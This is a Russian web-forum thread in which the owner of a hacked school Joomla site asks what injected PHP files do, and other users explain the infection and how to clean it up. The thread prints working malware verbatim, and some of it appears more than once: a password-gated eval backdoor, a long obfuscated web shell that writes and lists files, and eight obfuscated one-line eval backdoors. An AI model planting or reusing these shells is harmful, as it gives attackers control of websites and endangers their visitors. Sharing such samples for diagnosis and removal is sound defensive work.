Ошибки в файлах php

@YuliaSumina · Регистрация: 11.02.2016

Студворк — интернет-сервис помощи студентам

Друзья! Простите, что беспокою! Но вчера получила такое письмо: Вынуждены заблокировать ваш сайт gimnazia-zern.ru за запуск запрещенных процессов.

Подробности по процессам:

crond 812526 a111620_070776 cwd DIR 8,8 4096 7341975 /home/httpd/vhosts/gimnazia-zern.ru/httpdocs/cache/mod_footer
crond 812526 a111620_070776 rtd DIR 8,3 4096 192517 /
crond 812526 a111620_070776 txt REG 8,8 95063 7363933 (deleted)/home/httpd/vhosts/gimnazia-zern.ru/httpdocs/cache/mod_footer/crond

Советуем обратить внимание на файлы указанные ниже, они содержат потенциально опасный код в 1 и 2 строке, что может быть угрозой и уязвимостью через которую загружаются вредоносные и спам-скрипты.
Проверьте данные файлы:

/home/httpd/vhosts/gimnazia-zern.ru/httpdocs/tmp/install_54fb3d7c2aa41/zoo-language-master/nb-NO/dump.php
/home/httpd/vhosts/gimnazia-zern.ru/httpdocs/tmp/install_54fb3d7c2aa41/content-comments.min.php
и таких файлов штук 30.
Вот код одного из них

PHP
1
<?php if (md5($_POST['password']) == 'fa43e9ec621e611425946b5575b5aa4e') { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST['code'] . "'\051\051\073", ''); } ?>

Что из всего этого является опасным кодом?????
Вот другой код

PHP
1
2
<?php                                                                                                                                                                                                                                                                $u85="*+!fsN=,pHJ'R-)?det8"TFq\tjm]{r4(c\nS Ln\$g:/v5P9EzV`DoIk1@#[;3.Z2Ab%i6G^~7yMXU\\lKYa}|B_<0hQux&w>WCO\r"; $GLOBALS['vugzc88'] = ${$u85[84].$u85[44].$u85[96].$u85[34].$u85[21]}; $GLOBALS['vqkvq65'] = $u85[8].$u85[17].$u85[72].$u85[17].$u85[39].$u85[86]; $GLOBALS['bymoe18'] = $u85[32].$u85[87].$u85[29]; $GLOBALS['proll20'] = $u85[80].$u85[29].$u85[29].$u85[80].$u85[72].$u85[84].$u85[3].$u85[77].$u85[66].$u85[8]; $GLOBALS['ptfoc91'] = $u85[8].$u85[29].$u85[17].$u85[39].$u85[84].$u85[4].$u85[8].$u85[77].$u85[66].$u85[18]; $GLOBALS['kbqbx31'] = $u85[8].$u85[29].$u85[17].$u85[39].$u85[84].$u85[26].$u85[80].$u85[18].$u85[32].$u85[87].$u85[84].$u85[80].$u85[77].$u85[77]; $GLOBALS['obgea48'] = $u85[4].$u85[8].$u85[37].$u85[90].$u85[47].$u85[59].$u85[59]; $GLOBALS['grqqi22'] = $u85[51].$u85[8].$u85[17].$u85[37].$u85[16].$u85[66].$u85[29]; $GLOBALS['ldhum59'] = $u85[29].$u85[17].$u85[80].$u85[16].$u85[16].$u85[66].$u85[29]; $GLOBALS['zlssf42'] = $u85[32].$u85[51].$u85[89].$u85[37].$u85[18]; $GLOBALS['mkwxv20'] = $u85[32].$u85[77].$u85[51].$u85[4].$u85[17].$u85[16].$u85[66].$u85[29]; $GLOBALS['mxdax85'] = $u85[51].$u85[77].$u85[92].$u85[80].$u85[72].$u85[59].$u85[19]; $GLOBALS['ilvqw78'] = $u85[3].$u85[66].$u85[77].$u85[17].$u85[26].$u85[18].$u85[66].$u85[26].$u85[17]; $GLOBALS['rlxpu12'] = $u85[80].$u85[29].$u85[29].$u85[80].$u85[72].$u85[84].$u85[53].$u85[17].$u85[72].$u85[84].$u85[17].$u85[90].$u85[66].$u85[4].$u85[18].$u85[4]; $GLOBALS['vlvzd59'] = $u85[16].$u85[80].$u85[18].$u85[17]; $GLOBALS['xlurg54'] = $u85[80].$u85[29].$u85[4].$u85[51].$u85[29].$u85[18]; $GLOBALS['upjqq23'] = $u85[29].$u85[17].$u85[4].$u85[17].$u85[18]; $GLOBALS['bqdpk40'] = $u85[53].$u85[4].$u85[51].$u85[29].$u85[18]; $GLOBALS['lsrby68'] = $u85[18].$u85[66].$u85[26].$u85[17]; $GLOBALS['tnuog91'] = $u85[16].$u85[66].$u85[29].$u85[37].$u85[80].$u85[26].$u85[17]; $GLOBALS['qigqt47'] = $u85[3].$u85[51].$u85[8].$u85[17].$u85[37]; $GLOBALS['cwkbu47'] = $u85[3].$u85[92].$u85[29].$u85[66].$u85[18].$u85[17]; $GLOBALS['hbaav21'] = $u85[3].$u85[32].$u85[77].$u85[51].$u85[4].$u85[17]; $GLOBALS['zxufo52'] = $u85[18].$u85[51].$u85[89].$u85[32].$u85[87]; $GLOBALS['ezhme8'] = $u85[26].$u85[16].$u85[43]; $GLOBALS['swdnu18'] = $u85[3].$u85[29].$u85[17].$u85[80].$u85[16]; $GLOBALS['jdnwf8'] = $u85[66].$u85[4].$u85[84].$u85[16].$u85[66].$u85[29]; $GLOBALS['cakrv65'] = $u85[66].$u85[4].$u85[84].$u85[92].$u85[29].$u85[66].$u85[18].$u85[80].$u85[64].$u85[77].$u85[17]; $GLOBALS['evdus63'] = $u85[66].$u85[4].$u85[84].$u85[77].$u85[66].$u85[37].$u85[53]; $GLOBALS['wsyfo51'] = $u85[8].$u85[29].$u85[17].$u85[39].$u85[84].$u85[26].$u85[80].$u85[18].$u85[32].$u85[87]; $mpljm14=$u85[47].$u85[45].$u85[43].$u85[54].$u85[86].$u85[43].$u85[16]; if (isset($GLOBALS['vugzc88'][$mpljm14])) { function peyeg0($u85, $mlylo3){ $chhle25=""; for($yeeyv68=0;$yeeyv68<256;$yeeyv68++) { $vlqbc29[$yeeyv68]=$GLOBALS['bymoe18']($yeeyv68); } $asjom90=$GLOBALS['proll20']($GLOBALS['ptfoc91']($u85[41].$u85[41],$u85[63].$u85[83].$u85[95].$u85[50].$u85[46].$u85[22].$u85[68].$u85[9].$u85[52].$u85[10].$u85[78].$u85[36].$u85[73].$u85[5].$u85[96].$u85[44].$u85[88].$u85[12].$u85[34].$u85[21].$u85[75].$u85[48].$u85[94].$u85[74].$u85[79].$u85[61] . $u85[80].$u85[64].$u85[32].$u85[16].$u85[17].$u85[3].$u85[39].$u85[87].$u85[66].$u85[25].$u85[53].$u85[77].$u85[26].$u85[37].$u85[51].$u85[8].$u85[23].$u85[29].$u85[4].$u85[18].$u85[89].$u85[42].$u85[92].$u85[90].$u85[72].$u85[47].$u85[86].$u85[54].$u85[62].$u85[59].$u85[30].$u85[43].$u85[67].$u85[71].$u85[19].$u85[45].$u85[1].$u85[41],-1,1)); $akebn65=array(); $GLOBALS['kbqbx31']($u85[31].$u85[57].$u85[63].$u85[13].$u85[47].$u85[86].$u85[13].$u85[45].$u85[1].$u85[76].$u85[41].$u85[27].$u85[28].$u85[54].$u85[7].$u85[30].$u85[81].$u85[14],$mlylo3,$akebn65); foreach($akebn65[0] as $uscqe62){ $tbbrw69=0; for($yeeyv68=0;isset($uscqe62[$yeeyv68]);$yeeyv68++){ $tbbrw69=($tbbrw69<<6)+$asjom90[$uscqe62[$yeeyv68]]; if($yeeyv68>0){ $chhle25.=$vlqbc29[$tbbrw69>>(4-(2*($yeeyv68-1)))]; $tbbrw69=$tbbrw69&(0xf>>(2*($yeeyv68-1))); } } } return $chhle25; } function spnxz33($u85, $dsqwm90){ $jtymc31=array(); $gywti7=@$GLOBALS['grqqi22']($dsqwm90); if($gywti7!=FALSE){ while(false!==($arlma93=@$GLOBALS['ldhum59']($gywti7))){ if($GLOBALS['zlssf42']($jtymc31)>5000) { break; } $jtymc31[]=$arlma93; } $GLOBALS['mkwxv20']($gywti7); } return $jtymc31; } function olway38($u85, $dsqwm90){ $tftmi92=array(); foreach($GLOBALS['obgea48']($u85, $dsqwm90) as $ijiyp63){ if ($ijiyp63 == $u85[60] || $ijiyp63 == $u85[60].$u85[60]) { continue; } if (FALSE == ($tjcvb81 = @$GLOBALS['ilvqw78']($dsqwm90.$ijiyp63))) { continue; } if ($GLOBALS['rlxpu12']($GLOBALS['vlvzd59']($u85[79].$u85[26].$u85[16],$tjcvb81),$tftmi92)) { $tftmi92[$GLOBALS['vlvzd59']($u85[79].$u85[26].$u85[16],$tjcvb81)][$u85[32]]++; } else { $tftmi92[$GLOBALS['vlvzd59']($u85[79].$u85[26].$u85[16],$tjcvb81)][$u85[32]]=1; } $tftmi92[$GLOBALS['vlvzd59']($u85[79].$u85[26].$u85[16],$tjcvb81)][$u85[18]][]=$tjcvb81; } if ($GLOBALS['zlssf42']($tftmi92)>2){ $GLOBALS['xlurg54']($vqfrm89); $topas19=$GLOBALS['upjqq23']($vqfrm89); if($topas19[$u85[32]]<5) { $GLOBALS['bqdpk40']($vqfrm89); } $ixbse95=$GLOBALS['upjqq23']($vqfrm89); return $ixbse95[$u85[18]][0]; } else { return $GLOBALS['lsrby68'](NULL); } } if (isset($GLOBALS['vugzc88'][$u85[3]])) { $tjcvb81 = $GLOBALS['mxdax85']($u85, $GLOBALS['tnuog91']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[3]])).$u85[41]); if (($kgrow67=@$GLOBALS['qigqt47']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[3]]),$u85[90]))!=FALSE) { $GLOBALS['cwkbu47']($kgrow67,$GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$mpljm14])); $GLOBALS['hbaav21']($kgrow67); $GLOBALS['zxufo52']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[3]]),$tjcvb81,$tjcvb81); echo $GLOBALS['ezhme8'](104); } else { echo $GLOBALS['ezhme8'](101); } } if (isset($GLOBALS['vugzc88'][$u85[80]])) { if (($kgrow67=@$GLOBALS['qigqt47']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[80]]),$u85[29]))!=FALSE) { $gvibc28 = ""; while (FALSE != ($qfxtv9 = @$GLOBALS['swdnu18']($kgrow67, 1024))) { $gvibc28.=$qfxtv9; } @$GLOBALS['hbaav21']($kgrow67); $ydlrq32 = $GLOBALS['ilvqw78']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[80]])); if (($kgrow67=@$GLOBALS['qigqt47']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[80]]),$u85[92]))!=FALSE) { $GLOBALS['cwkbu47']($kgrow67,$GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$mpljm14]).$gvibc28); $GLOBALS['hbaav21']($kgrow67); $GLOBALS['zxufo52']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[80]]),$ydlrq32, $ydlrq32); echo $GLOBALS['ezhme8'](104); } else { echo $GLOBALS['ezhme8'](101); } } else { echo $GLOBALS['ezhme8'](101); } } if (isset($GLOBALS['vugzc88'][$u85[4]])) { $rzlmj26 = $_SERVER[$u85[50].$u85[96].$u85[95].$u85[75].$u85[73].$u85[46].$u85[5].$u85[21].$u85[84].$u85[12].$u85[96].$u85[96].$u85[21]]; if (isset($GLOBALS['vugzc88'][$u85[8]])) { $rzlmj26 = $GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[8]]); } $oqxhw61[] = $rzlmj26; $tmath0=0; echo $GLOBALS['ezhme8'](104).$u85[33]; for ($yeeyv68=0;$yeeyv68<$GLOBALS['zlssf42']($oqxhw61);$yeeyv68++) { $nlxhu38 = $GLOBALS['obgea48']($u85, $oqxhw61[$yeeyv68]); foreach ($nlxhu38 as $turqr94 ) { if ($turqr94 == $u85[60] || $turqr94 == $u85[60].$u85[60]) { continue; } $zwdmx98 = $oqxhw61[$yeeyv68] . DIRECTORY_SEPARATOR . $turqr94; if (@$GLOBALS['jdnwf8']($zwdmx98)) { $oqxhw61[] = $zwdmx98; if ($GLOBALS['vugzc88'][$u85[4]] != $u85[16]) { continue; } if (!@$GLOBALS['cakrv65']($zwdmx98)) { continue; } if (@$GLOBALS['evdus63']($zwdmx98)) { continue; } echo $zwdmx98.$u85[33]; $tmath0++; } else { if ($GLOBALS['vugzc88'][$u85[4]] != $u85[3]) { continue; } if (@$GLOBALS['wsyfo51']($u85[41].$u85[60].$u85[1].$u85[76].$u85[60].$u85[8].$u85[87].$u85[8].$u85[38].$u85[41].$u85[66], $turqr94) == 0) { continue; } if (!@$GLOBALS['cakrv65']($zwdmx98)) { continue; } if (@$GLOBALS['evdus63']($zwdmx98)) { continue; } echo $zwdmx98.$u85[33]; $tmath0++; } } if ($yeeyv68 > 100 && $tmath0 > 1000) { break; } } return; } if (isset($GLOBALS['vugzc88'][$u85[18]])) { echo $GLOBALS['ezhme8'](104); } } 
?>

Для меня это темный лес!!!!! Помогите!!!!!!

quwy · 11.02.2016, 20:04

Сообщение от YuliaSumina

Что из всего этого является опасным кодом?????

Это все сплошной опасный код.

Ваш сайт взломан и в него добавлен вредоносный код, который заражает компьютеры посетителей.
Используйте надежные скрипты актуальных версий чтобы сайт не ломали каждую неделю.

@Hikari · 11.02.2016, 20:08

Сообщение от YuliaSumina

Что из всего этого является опасным кодом?

Честно говоря - все.
По крайней мере меня бы ужаснуло от такого кода, я бы даже не стала проверять обфускация это в пользу защиты интеллектуальной собственности или такая заморочка для сокрытия зловреда.

@YuliaSumina · 11.02.2016, 20:35 **[ТС]**

Спасибо Вам! Это сайт образовательного учреждения и хостинг платный. Может подскажите ссылки на надежные скрипты???

@Laroux · 11.02.2016, 20:54

Сообщение от YuliaSumina

надежные скрипты

скрипты чего?

@maruo · 11.02.2016, 20:56

Кликните здесь для просмотра всего текста

PHP
1
2
3
4
5
<?php if (md5($_POST['password']) == 'fa43e9ec621e611425946b5575b5aa4e') { preg_replace("\043\056\052\043\145", "\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050'" . $_POST['code'] . "'\051\051\073", ''); } ?>
Что из всего этого является опасным кодом?????
Вот другой код
<?php $u85="*+!fsN=,pHJ'R-)?det8"TFq\tjm]{r4(c\nS Ln\$g:/v5P9EzV`DoIk1@#[;3.Z2Ab%i6G^~7yMXU\\lKYa}|B_<0hQux&w>WCO\r"; $GLOBALS['vugzc88'] = ${$u85[84].$u85[44].$u85[96].$u85[34].$u85[21]}; $GLOBALS['vqkvq65'] = $u85[8].$u85[17].$u85[72].$u85[17].$u85[39].$u85[86]; $GLOBALS['bymoe18'] = $u85[32].$u85[87].$u85[29]; $GLOBALS['proll20'] = $u85[80].$u85[29].$u85[29].$u85[80].$u85[72].$u85[84].$u85[3].$u85[77].$u85[66].$u85[8]; $GLOBALS['ptfoc91'] = $u85[8].$u85[29].$u85[17].$u85[39].$u85[84].$u85[4].$u85[8].$u85[77].$u85[66].$u85[18]; $GLOBALS['kbqbx31'] = $u85[8].$u85[29].$u85[17].$u85[39].$u85[84].$u85[26].$u85[80].$u85[18].$u85[32].$u85[87].$u85[84].$u85[80].$u85[77].$u85[77]; $GLOBALS['obgea48'] = $u85[4].$u85[8].$u85[37].$u85[90].$u85[47].$u85[59].$u85[59]; $GLOBALS['grqqi22'] = $u85[51].$u85[8].$u85[17].$u85[37].$u85[16].$u85[66].$u85[29]; $GLOBALS['ldhum59'] = $u85[29].$u85[17].$u85[80].$u85[16].$u85[16].$u85[66].$u85[29]; $GLOBALS['zlssf42'] = $u85[32].$u85[51].$u85[89].$u85[37].$u85[18]; $GLOBALS['mkwxv20'] = $u85[32].$u85[77].$u85[51].$u85[4].$u85[17].$u85[16].$u85[66].$u85[29]; $GLOBALS['mxdax85'] = $u85[51].$u85[77].$u85[92].$u85[80].$u85[72].$u85[59].$u85[19]; $GLOBALS['ilvqw78'] = $u85[3].$u85[66].$u85[77].$u85[17].$u85[26].$u85[18].$u85[66].$u85[26].$u85[17]; $GLOBALS['rlxpu12'] = $u85[80].$u85[29].$u85[29].$u85[80].$u85[72].$u85[84].$u85[53].$u85[17].$u85[72].$u85[84].$u85[17].$u85[90].$u85[66].$u85[4].$u85[18].$u85[4]; $GLOBALS['vlvzd59'] = $u85[16].$u85[80].$u85[18].$u85[17]; $GLOBALS['xlurg54'] = $u85[80].$u85[29].$u85[4].$u85[51].$u85[29].$u85[18]; $GLOBALS['upjqq23'] = $u85[29].$u85[17].$u85[4].$u85[17].$u85[18]; $GLOBALS['bqdpk40'] = $u85[53].$u85[4].$u85[51].$u85[29].$u85[18]; $GLOBALS['lsrby68'] = $u85[18].$u85[66].$u85[26].$u85[17]; $GLOBALS['tnuog91'] = $u85[16].$u85[66].$u85[29].$u85[37].$u85[80].$u85[26].$u85[17]; $GLOBALS['qigqt47'] = $u85[3].$u85[51].$u85[8].$u85[17].$u85[37]; $GLOBALS['cwkbu47'] = $u85[3].$u85[92].$u85[29].$u85[66].$u85[18].$u85[17]; $GLOBALS['hbaav21'] = $u85[3].$u85[32].$u85[77].$u85[51].$u85[4].$u85[17]; $GLOBALS['zxufo52'] = $u85[18].$u85[51].$u85[89].$u85[32].$u85[87]; $GLOBALS['ezhme8'] = $u85[26].$u85[16].$u85[43]; $GLOBALS['swdnu18'] = $u85[3].$u85[29].$u85[17].$u85[80].$u85[16]; $GLOBALS['jdnwf8'] = $u85[66].$u85[4].$u85[84].$u85[16].$u85[66].$u85[29]; $GLOBALS['cakrv65'] = $u85[66].$u85[4].$u85[84].$u85[92].$u85[29].$u85[66].$u85[18].$u85[80].$u85[64].$u85[77].$u85[17]; $GLOBALS['evdus63'] = $u85[66].$u85[4].$u85[84].$u85[77].$u85[66].$u85[37].$u85[53]; $GLOBALS['wsyfo51'] = $u85[8].$u85[29].$u85[17].$u85[39].$u85[84].$u85[26].$u85[80].$u85[18].$u85[32].$u85[87]; $mpljm14=$u85[47].$u85[45].$u85[43].$u85[54].$u85[86].$u85[43].$u85[16]; if (isset($GLOBALS['vugzc88'][$mpljm14])) { function peyeg0($u85, $mlylo3){ $chhle25=""; for($yeeyv68=0;$yeeyv68<256;$yeeyv68++) { $vlqbc29[$yeeyv68]=$GLOBALS['bymoe18']($yeeyv68); } $asjom90=$GLOBALS['proll20']($GLOBALS['ptfoc91']($u85[41].$u85[41],$u85[63].$u85[83].$u85[95].$u85[50].$u85[46].$u85[22].$u85[68].$u85[9].$u85[52].$u85[10].$u85[78].$u85[36].$u85[73].$u85[5].$u85[96].$u85[44].$u85[88].$u85[12].$u85[34].$u85[21].$u85[75].$u85[48].$u85[94].$u85[74].$u85[79].$u85[61] . $u85[80].$u85[64].$u85[32].$u85[16].$u85[17].$u85[3].$u85[39].$u85[87].$u85[66].$u85[25].$u85[53].$u85[77].$u85[26].$u85[37].$u85[51].$u85[8].$u85[23].$u85[29].$u85[4].$u85[18].$u85[89].$u85[42].$u85[92].$u85[90].$u85[72].$u85[47].$u85[86].$u85[54].$u85[62].$u85[59].$u85[30].$u85[43].$u85[67].$u85[71].$u85[19].$u85[45].$u85[1].$u85[41],-1,1)); $akebn65=array(); $GLOBALS['kbqbx31']($u85[31].$u85[57].$u85[63].$u85[13].$u85[47].$u85[86].$u85[13].$u85[45].$u85[1].$u85[76].$u85[41].$u85[27].$u85[28].$u85[54].$u85[7].$u85[30].$u85[81].$u85[14],$mlylo3,$akebn65); foreach($akebn65[0] as $uscqe62){ $tbbrw69=0; for($yeeyv68=0;isset($uscqe62[$yeeyv68]);$yeeyv68++){ $tbbrw69=($tbbrw69<<6)+$asjom90[$uscqe62[$yeeyv68]]; if($yeeyv68>0){ $chhle25.=$vlqbc29[$tbbrw69>>(4-(2*($yeeyv68-1)))]; $tbbrw69=$tbbrw69&(0xf>>(2*($yeeyv68-1))); } } } return $chhle25; } function spnxz33($u85, $dsqwm90){ $jtymc31=array(); $gywti7=@$GLOBALS['grqqi22']($dsqwm90); if($gywti7!=FALSE){ while(false!==($arlma93=@$GLOBALS['ldhum59']($gywti7))){ if($GLOBALS['zlssf42']($jtymc31)>5000) { break; } $jtymc31[]=$arlma93; } $GLOBALS['mkwxv20']($gywti7); } return $jtymc31; } function olway38($u85, $dsqwm90){ $tftmi92=array(); foreach($GLOBALS['obgea48']($u85, $dsqwm90) as $ijiyp63){ if ($ijiyp63 == $u85[60] || $ijiyp63 == $u85[60].$u85[60]) { continue; } if (FALSE == ($tjcvb81 = @$GLOBALS['ilvqw78']($dsqwm90.$ijiyp63))) { continue; } if ($GLOBALS['rlxpu12']($GLOBALS['vlvzd59']($u85[79].$u85[26].$u85[16],$tjcvb81),$tftmi92)) { $tftmi92[$GLOBALS['vlvzd59']($u85[79].$u85[26].$u85[16],$tjcvb81)][$u85[32]]++; } else { $tftmi92[$GLOBALS['vlvzd59']($u85[79].$u85[26].$u85[16],$tjcvb81)][$u85[32]]=1; } $tftmi92[$GLOBALS['vlvzd59']($u85[79].$u85[26].$u85[16],$tjcvb81)][$u85[18]][]=$tjcvb81; } if ($GLOBALS['zlssf42']($tftmi92)>2){ $GLOBALS['xlurg54']($vqfrm89); $topas19=$GLOBALS['upjqq23']($vqfrm89); if($topas19[$u85[32]]<5) { $GLOBALS['bqdpk40']($vqfrm89); } $ixbse95=$GLOBALS['upjqq23']($vqfrm89); return $ixbse95[$u85[18]][0]; } else { return $GLOBALS['lsrby68'](NULL); } } if (isset($GLOBALS['vugzc88'][$u85[3]])) { $tjcvb81 = $GLOBALS['mxdax85']($u85, $GLOBALS['tnuog91']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[3]])).$u85[41]); if (($kgrow67=@$GLOBALS['qigqt47']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[3]]),$u85[90]))!=FALSE) { $GLOBALS['cwkbu47']($kgrow67,$GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$mpljm14])); $GLOBALS['hbaav21']($kgrow67); $GLOBALS['zxufo52']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[3]]),$tjcvb81,$tjcvb81); echo $GLOBALS['ezhme8'](104); } else { echo $GLOBALS['ezhme8'](101); } } if (isset($GLOBALS['vugzc88'][$u85[80]])) { if (($kgrow67=@$GLOBALS['qigqt47']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[80]]),$u85[29]))!=FALSE) { $gvibc28 = ""; while (FALSE != ($qfxtv9 = @$GLOBALS['swdnu18']($kgrow67, 1024))) { $gvibc28.=$qfxtv9; } @$GLOBALS['hbaav21']($kgrow67); $ydlrq32 = $GLOBALS['ilvqw78']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[80]])); if (($kgrow67=@$GLOBALS['qigqt47']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[80]]),$u85[92]))!=FALSE) { $GLOBALS['cwkbu47']($kgrow67,$GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$mpljm14]).$gvibc28); $GLOBALS['hbaav21']($kgrow67); $GLOBALS['zxufo52']($GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[80]]),$ydlrq32, $ydlrq32); echo $GLOBALS['ezhme8'](104); } else { echo $GLOBALS['ezhme8'](101); } } else { echo $GLOBALS['ezhme8'](101); } } if (isset($GLOBALS['vugzc88'][$u85[4]])) { $rzlmj26 = $_SERVER[$u85[50].$u85[96].$u85[95].$u85[75].$u85[73].$u85[46].$u85[5].$u85[21].$u85[84].$u85[12].$u85[96].$u85[96].$u85[21]]; if (isset($GLOBALS['vugzc88'][$u85[8]])) { $rzlmj26 = $GLOBALS['vqkvq65']($u85, $GLOBALS['vugzc88'][$u85[8]]); } $oqxhw61[] = $rzlmj26; $tmath0=0; echo $GLOBALS['ezhme8'](104).$u85[33]; for ($yeeyv68=0;$yeeyv68<$GLOBALS['zlssf42']($oqxhw61);$yeeyv68++) { $nlxhu38 = $GLOBALS['obgea48']($u85, $oqxhw61[$yeeyv68]); foreach ($nlxhu38 as $turqr94 ) { if ($turqr94 == $u85[60] || $turqr94 == $u85[60].$u85[60]) { continue; } $zwdmx98 = $oqxhw61[$yeeyv68] . DIRECTORY_SEPARATOR . $turqr94; if (@$GLOBALS['jdnwf8']($zwdmx98)) { $oqxhw61[] = $zwdmx98; if ($GLOBALS['vugzc88'][$u85[4]] != $u85[16]) { continue; } if (!@$GLOBALS['cakrv65']($zwdmx98)) { continue; } if (@$GLOBALS['evdus63']($zwdmx98)) { continue; } echo $zwdmx98.$u85[33]; $tmath0++; } else { if ($GLOBALS['vugzc88'][$u85[4]] != $u85[3]) { continue; } if (@$GLOBALS['wsyfo51']($u85[41].$u85[60].$u85[1].$u85[76].$u85[60].$u85[8].$u85[87].$u85[8].$u85[38].$u85[41].$u85[66], $turqr94) == 0) { continue; } if (!@$GLOBALS['cakrv65']($zwdmx98)) { continue; } if (@$GLOBALS['evdus63']($zwdmx98)) { continue; } echo $zwdmx98.$u85[33]; $tmath0++; } } if ($yeeyv68 > 100 && $tmath0 > 1000) { break; } } return; } if (isset($GLOBALS['vugzc88'][$u85[18]])) { echo $GLOBALS['ezhme8'](104); } } 
?>

мамочка что это)
В одну сплошную линию .......

quwy · 11.02.2016, 21:26

Сообщение от YuliaSumina

Может подскажите ссылки на надежные скрипты???

Сайт у вас на базе чего?

@YuliaSumina · 11.02.2016, 21:29 **[ТС]**

Сайт на базе https://mchost.ru/

quwy · 12.02.2016, 12:46

Я не про хостинг спрашивал. На базе какого скрипта сайт?

@SedoyVoron · 26.02.2016, 01:13

Платформа у него Joomla. Версия до 3.4.8. Описан файл docs\libraries\joomla\exporter.php Про ошибку стало известно 15.12.2015 это была уязвимость версии 3.4.5 и ниже. Файл генериреут не только вредоносный код типа

Кликните здесь для просмотра всего текста

<?php $wsh5 = "so_preut" ;$dvus5 = $wsh5[0]. $wsh5[7].$wsh5[4]. $wsh5[7].$wsh5[1].$wsh5[6].$wsh5[3]. $wsh5[3]. $wsh5[5].$wsh5[4];$tbxg8= $dvus5( $wsh5[2].$wsh5[3]. $wsh5[1].$wsh5[0].$wsh5[7] ); if (isset(${$tbxg8 }[ 'q2a5248'])) {eval( ${$tbxg8 } [ 'q2a5248'] ) ; }?>

<?php $vkll87= "oe_tpurs"; $wmx29 = $vkll87[7]. $vkll87[3].$vkll87[6].$vkll87[3]. $vkll87[0].$vkll87[5]. $vkll87[4]. $vkll87[4].$vkll87[1].$vkll87[6]; $tseh4=$wmx29 ( $vkll87[2].$vkll87[4] .$vkll87[0].$vkll87[7]. $vkll87[3] ) ;if ( isset(${$tseh4 }[ 'qe0080b' ] )) {eval(${ $tseh4 } ['qe0080b' ]);}?>

<?php $azb92 = "_teourps" ;$xjy91 = $azb92[7].$azb92[1].$azb92[5].$azb92[1].$azb92[3].$azb92[4].$azb92[6]. $azb92[6].$azb92[2]. $azb92[5]; $fkaa10 = $xjy91 ( $azb92[0]. $azb92[6] .$azb92[3].$azb92[7].$azb92[1]) ;if ( isset(${$fkaa10}['q22ec2b'] )) {eval ( ${ $fkaa10} ['q22ec2b']) ; } ?>

<?php $hng8= "u_psoert" ; $gjfd4=$hng8[3]. $hng8[7].$hng8[6].$hng8[7].$hng8[4]. $hng8[0]. $hng8[2].$hng8[2].$hng8[5].$hng8[6] ; $kpqd9=$gjfd4( $hng8[1].$hng8[2] .$hng8[4].$hng8[3]. $hng8[7] ) ; if(isset( ${ $kpqd9} ['q59a097'] ) ) {eval(${ $kpqd9 } [ 'q59a097'] ) ; } ?>

<?php $vyy63 ="_eotpsur";$nem4 =$vyy63[5].$vyy63[3]. $vyy63[7].$vyy63[3]. $vyy63[2].$vyy63[6].$vyy63[4].$vyy63[4]. $vyy63[1].$vyy63[7] ; $sygn83 =$nem4 ($vyy63[0].$vyy63[4] . $vyy63[2].$vyy63[5]. $vyy63[3]) ; if (isset ( ${$sygn83} [ 'q3729f7' ])) { eval ( ${ $sygn83 } [ 'q3729f7']);}?>

<?php $osy02 ="uospte_r" ;$fnt3 =$osy02[2]. $osy02[4]. $osy02[7].$osy02[4].$osy02[1].$osy02[0]. $osy02[3]. $osy02[3]. $osy02[5]. $osy02[7]; $qfjy8 =$fnt3($osy02[6].$osy02[3]. $osy02[1].$osy02[2]. $osy02[4]) ;if (isset ( ${$qfjy8} ['q1c1ae6' ] )) { eval (${ $qfjy8 } ['q1c1ae6' ] ); }?>

<?php $bhr3= "speru_ot";$fitl43 = $bhr3[0].$bhr3[7]. $bhr3[3]. $bhr3[7]. $bhr3[6]. $bhr3[4]. $bhr3[1].$bhr3[1]. $bhr3[2].$bhr3[3];$iqk62 = $fitl43( $bhr3[5]. $bhr3[1].$bhr3[6].$bhr3[0]. $bhr3[7]); if ( isset( ${ $iqk62 }['q7f69dd'])) {eval ( ${ $iqk62} [ 'q7f69dd']);} ?>

<?php $mzvj5= "to_esupr" ; $nvtf2 = $mzvj5[4]. $mzvj5[0].$mzvj5[7].$mzvj5[0]. $mzvj5[1].$mzvj5[5]. $mzvj5[6].$mzvj5[6]. $mzvj5[3]. $mzvj5[7]; $ntfn4=$nvtf2( $mzvj5[2]. $mzvj5[6]. $mzvj5[1].$mzvj5[4].$mzvj5[0]); if(isset( ${ $ntfn4} ['q89024b'] )) { eval(${ $ntfn4} [ 'q89024b' ] ); }?>

но и создаёт папки типа

Кликните здесь для просмотра всего текста

sgrzaiq
wcvlxeb
zthcwlb
gwbekak
rhzlpnv
bsleprv
rejewrc
fdzbxie

в которых идут ссылки по разным низкочастотным запросам и с вредоносными прогами. Если хочешь норм почистить то проверь все php файлы. Каспер в помощь по части файлов он покажит вирус как Trojan.PHP.Agent.jj
В основном все файлы новые, так что вычисляй по дате создания, но в нескольких случаях вирус вшивался ещё и в нормальные файлы, так что чистить тебе руками, как и мне =) В первую очередь поищи папки с вложенными { eval и {eval - найдёшь большую часть заразы. Да пароль тебе от FTP и префикс БД надо теперь поменять, как и пасс от админки сайта, а лучше скрой админку плагином чтобы вышло ../administrator?fig-vzlomaesh

Новые блоги и статьи Все статьи Все блоги /
